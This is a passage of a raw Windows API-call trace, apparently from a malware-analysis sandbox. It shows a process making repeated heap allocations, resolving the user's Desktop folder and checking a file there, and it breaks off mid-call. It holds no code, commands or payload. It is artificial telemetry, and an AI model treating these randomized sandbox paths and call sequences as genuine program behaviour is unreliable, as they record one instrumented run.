RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0165.826] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0165.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0165.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0165.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0165.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0165.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0165.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab340 [0165.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0165.826] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0165.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0165.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0165.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0165.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0165.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0165.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0165.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0165.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0165.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0165.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0165.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0165.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0165.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0165.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0165.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0165.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0165.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x249c7b0 [0165.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0165.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0165.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0165.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0165.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0165.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0165.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0165.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1428 [0165.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0165.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0165.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0165.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0165.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16c8 [0165.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0165.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0165.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0165.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95d0 [0165.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0165.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0165.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0165.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0165.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0165.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0165.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0165.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0165.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0165.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0165.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0165.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0165.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0165.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0165.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0165.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0165.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0165.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0165.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0165.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0165.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0165.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0165.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0165.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0165.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0165.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0165.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0165.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0165.829] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0165.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0165.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0165.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0165.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0165.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0165.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0165.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0165.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0165.830] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0165.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0165.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0165.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0165.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0165.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0165.830] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0165.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0165.830] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0165.831] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0165.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0165.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0165.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0165.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0165.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0165.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0165.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0165.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0165.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0165.831] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0165.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0165.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0165.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0165.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0165.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0165.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0165.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0165.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0165.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0165.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0165.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0165.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0165.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0165.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0165.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0165.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0165.832] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0165.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0165.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0165.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0165.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0165.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0165.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0165.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0165.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0165.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0165.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0165.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0165.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0165.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0165.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0165.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0165.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0165.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0165.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0165.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0165.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0165.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0165.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0165.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0165.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0165.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0165.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0165.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0165.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0165.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0165.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0165.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0165.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0165.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0165.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0165.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0165.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0165.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0165.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0165.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0165.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0165.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0165.834] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0165.834] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0165.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0165.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0165.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0165.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0165.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0165.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0165.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0165.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0165.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0165.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0165.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0165.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0165.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0165.835] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0165.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0165.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0165.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0165.835] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0165.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0165.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0165.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0165.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0165.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0165.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0165.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0165.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0165.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0165.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0165.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0165.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0165.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0165.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0165.836] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/GyHm6iovQDw.m4a", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9c030, ftCreationTime.dwHighDateTime=0x1d4ccbb, ftLastAccessTime.dwLowDateTime=0x83648e20, ftLastAccessTime.dwHighDateTime=0x1d4cfe6, ftLastWriteTime.dwLowDateTime=0x83648e20, ftLastWriteTime.dwHighDateTime=0x1d4cfe6, nFileSizeHigh=0x0, nFileSizeLow=0x136a0, dwReserved0=0x9a70006, dwReserved1=0xe6f8, cFileName="GyHm6iovQDw.m4a", cAlternateFileName="GYHM6I~1.M4A")) returned 0xaa5660 [0165.836] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0165.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0165.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0165.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0165.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0165.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0165.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0165.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0165.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0165.837] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0165.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0165.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0165.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0165.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0165.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0165.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0165.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0165.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0165.837] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0165.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0165.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0165.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0165.838] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0165.838] RtlAllocateHeap (HeapHandle=0x25c0000, 